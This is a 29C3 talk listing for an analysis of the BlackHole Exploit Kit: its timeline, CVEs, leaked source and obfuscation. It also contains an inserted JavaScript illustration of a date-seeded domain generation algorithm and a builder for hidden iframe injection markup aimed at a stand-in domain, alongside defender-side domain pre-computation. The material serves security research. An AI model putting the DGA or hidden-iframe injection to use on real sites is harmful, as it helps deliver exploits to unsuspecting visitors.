29C3 - Version 1.9

Fahrplan 29C3

Speakers: Julia Wolf

Schedule
Day: Day 3 - 2012-12-29
Room: Saal 1
Start time: 14:00
Duration: 01:00

Info
ID: 5205
Event type: Lecture
Language used for presentation: English

Analytical Summary of the BlackHole Exploit Kit

Almost Everything You Ever Wanted To Know About The BlackHole Exploit Kit

There are hundreds, if not thousands, of news articles and blog posts about the BlackHole Exploit Kit. Usually, each story covers only a very narrow part of the subject matter. This talk will summarize the history of the BlackHole Exploit Kit into one easy-to-follow story. There will be diagrams and flow-charts for explaining code, rather than a giant blob of illegible JavaScript, PHP, or x86 assembly.

A. What a browser exploit kit is, and what it isn't

  1. It only delivers the exploits
  2. Directing victims to the exploits is out of scope
  3. That is usually done with spam or iframe injections
  4. The actual malware installed is out of scope too
  5. Where the exploit kit is hosted is also quite variable

B. Timeline

  1. Version 1.0.0 - September 2010
     i. It's not that different from other exploit kits
  2. Version 1.0.1
  3. Version 1.0.2 - November 2010
     i. Changelog
     ii. Leaked in May 2011
  4. Version 1.1.0 - December 2010
     i. Changelog
  5. Version 1.2.0 - August 2011
     i. Changelog
  6. Version 1.2.1 - December 2011
  7. Version 1.2.2
     i. Cryptome "Virus"
  8. Version 1.2.3 - March 2012
  9. Version 1.2.4 - June 2012
     i. CVE-2012-1723
     ii. CVE-2011-2110
  10. Version 1.2.5 - July 2012
     i. CVE-2012-1889
     ii. A single IFRAME injection campaign uses a temporal 'Domain Generation Algorithm'
  11. August 2012
     i. CVE-2012-4681
  12. Version 2.0.0 - September 2012
     i. Changelog
     ii. The official announcement isn't entirely true.
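The temporal 'Domain Generation Algorithm' mentioned for the 1.2.5-era IFRAME injection campaign, as an added illustration that is not part of this abstract and not BlackHole's own code: a generic date-seeded DGA in JavaScript, plus the defender-side pre-computation that becomes possible once the algorithm is recovered from an injected script. The FNV-1a hash, the 12-character label, the `.example` TLD and the `secret` string are all assumptions made for the example; the talk outline gives no details of the real algorithm.

```javascript
// Added illustration of a date-seeded ("temporal") DGA as used by an
// iframe-injection campaign: the injected script computes a fresh landing
// domain each day, so static blocklists of yesterday's domain miss today's.
// Hypothetical construction; hash, alphabet, label length, TLD and secret
// are assumptions and none of this is BlackHole's actual code.

const ALPHABET = "abcdefghijklmnopqrstuvwxyz";
const LABEL_LEN = 12;
const TLD = ".example"; // assumption: reserved TLD, resolves to nothing
const DEFAULT_SECRET = "campaign-secret"; // assumption: mixed into the seed

// 32-bit FNV-1a: small, dependency-free, deterministic across client and server.
function fnv1a(str) {
  let h = 0x811c9dc5;
  for (let i = 0; i < str.length; i++) {
    h ^= str.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h >>> 0;
}

// Seed is the UTC calendar date so every victim browser in every time zone
// computes the same domain on the same day.
function dateSeed(date) {
  return date.toISOString().slice(0, 10); // "YYYY-MM-DD"
}

// One domain per (secret, day). Each label position hashes the seed with its
// index so the label does not simply repeat one 32-bit value.
function domainForDate(date, secret = DEFAULT_SECRET) {
  const seed = secret + "|" + dateSeed(date);
  let label = "";
  for (let i = 0; i < LABEL_LEN; i++) {
    label += ALPHABET[fnv1a(seed + "#" + i) % ALPHABET.length];
  }
  return label + TLD;
}

// What an injected snippet would emit at page load. Returned as a string
// only; nothing is written into any DOM here.
function injectedIframeMarkup(now = new Date(), secret = DEFAULT_SECRET) {
  const host = domainForDate(now, secret);
  return '<iframe src="http://' + host + '/" width="1" height="1" style="display:none"></iframe>';
}

// Defender side: with the algorithm and secret pulled out of the injected
// script, pre-compute the schedule and block or sinkhole the domains early.
function upcomingDomains(start, days, secret = DEFAULT_SECRET) {
  const out = [];
  for (let d = 0; d < days; d++) {
    const day = new Date(start.getTime() + d * 86400 * 1000);
    out.push({ date: dateSeed(day), domain: domainForDate(day, secret) });
  }
  return out;
}

// Constructed sample run: the week starting 2012-07-01 (UTC).
const SAMPLE_START = new Date(Date.UTC(2012, 6, 1));
for (const entry of upcomingDomains(SAMPLE_START, 7)) {
  console.log(entry.date, entry.domain);
}
```

The point for a defender is the last function: a temporal DGA is only an obstacle while its inputs are unknown. Once the seed format and the secret are recovered from one injected page, the whole future schedule falls out, which is why campaign operators also rotate the secret or the algorithm itself.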

C. The "Free Version"

  1. Pulled from a system with C99 Shell
  2. IonCube "copy protection"
  3. How to break IonCube obfuscation
  4. Analysis of PHP Source Code

D. Open Source Code in use

  1. PluginDetect
  2. MaxMind GeoIP
  3. etc.

E. The Exploits

  1. CVE-2010-0188
  2. etc. etc. etc. as time allows

X. There is almost no change in the exploits themselves from one version of the exploit kit to the next.

Y. Curious clues about the possible authorship of some exploits